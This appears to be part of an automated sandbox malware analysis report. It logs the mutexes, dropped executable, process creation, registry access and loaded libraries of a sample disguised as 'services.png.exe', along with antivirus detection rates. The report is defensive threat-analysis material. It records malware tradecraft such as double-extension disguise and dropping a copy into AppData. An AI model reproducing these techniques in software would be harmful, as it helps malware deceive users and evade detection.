Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0856F5604629B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D011725604F6869113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0796356049E979113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D09560560472949113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0997C56047E889113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08563560462979113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08175560466819113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F17D560416899113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D041705604A6849113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D025625604C2969113
Source: C:\Users\user\Desktop\services.png.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A96656044E929113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0697256048E869113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0197A5604FE8E9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D041625604A6969113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0056B5604E29F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D725604EA869113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E56A5604029E9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07162560496969113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07170560496849113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D09D7156047A859113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D06575560482819113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C97156042E859113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0397B5604DE8F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F57B5604128F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0417B5604A68F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F17F5604168B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F571560412859113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C5795604228D9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0996156047E959113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0696F56048E9B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\3B8809DD89B8E88D23957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A97D56044E899113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F17B5604168F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0CD7956042A8D9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A57F5604428B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0795956049EAD9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D045795604A28D9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D05D615604BA959113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0AD6C56044A989113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D7D5604EA899113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0996F56047E9B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07158560496AC9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\0F049BA1BD347AF123957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D021705604C6849113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D029635604CE979113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D05D7E5604BA8A9113
Source: C:\Users\user\Desktop\services.png.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\05BB093DB78BE86D23957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08D7C56046A889113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D09571560472859113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D015605604F2949113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0097F5604EE8B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D039705604DE849113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D035615604D2959113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D051745604B6809113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0DD6B56043A9F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07D6856049A9C9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D055625604B2969113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0355B5604D2AF9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0017A5604E68E9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E56C560402989113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\6B4D50CDD97DB19D23957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0217B5604C68F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E97756040E839113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F163560416979113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0DD7E56043A8A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C171560426859113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D05D695604BA9D9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E576560402829113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A97556044E819113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0616E5604869A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D01D6A5604FA9E9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0116B5604F69F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0756E5604929A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D635604EA979113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\8C2113323E11F26223957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D04D705604AA849113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D019725604FE869113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B96156045E959113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0DD6856043A9C9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D03D6B5604DA9F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07D7756049A839113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0855B560462AF9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D03D725604DA869113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F570560412849113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D05D7A5604BA8E9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08D7556046A819113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0DD6156043A959113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\8ABCBD56388C5C0623957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0FD6256041A969113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0197D5604FE899113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D039735604DE879113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F96A56041E9E9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D96256043E969113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C160560426949113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C97E56042E8A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0ED7D56040A899113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\7FFBB6ACCDCB57FC23957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D04D735604AA879113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\49AE68A7FB9E89F723957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D049735604AE879113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D075785604928C9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E96256040E969113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0157C5604F2889113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0BD7F56045A8B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\7CFBB6ACCECB57FC23957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07561560492959113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D05D605604BA949113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C176560426829113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D5B5604EAAF9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0397E5604DE8A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C16F5604269B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F97556041E819113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D97A56043E8E9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\EB2C0736591CE66623957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0896056046E949113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D176560436829113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08D7F56046A8B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D06172560486869113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\6A4D50CDD87DB19D23957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D011625604F6969113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D03D635604DA979113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B57F5604528B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08562560462969113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D595604EAAD9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B1795604568D9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0656B5604829F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0CD6B56042A9F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0957E5604728A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0FD7E56041A8A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0797A56049E8E9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C16D560426999113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D97756043E839113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D09D7356047A879113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F97D56041E899113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D029615604CE959113

Source: C:\Users\user\Desktop\services.png.exe

File created: C:\Users\user\AppData\Local\Temp\tmp3809.tmp

Jump to behavior

Source: services.png.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\services.png.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: services.png.exe	Virustotal: Detection: 84%
Source: services.png.exe	ReversingLabs: Detection: 89%

Source: C:\Users\user\Desktop\services.png.exe

File read: C:\Users\user\Desktop\services.png.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\services.png.exe "C:\Users\user\Desktop\services.png.exe"
Source: C:\Users\user\Desktop\services.png.exe	Process created: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe "C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe"
Source: C:\Users\user\Desktop\services.png.exe	Process created: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe "C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe"	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\services.png.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
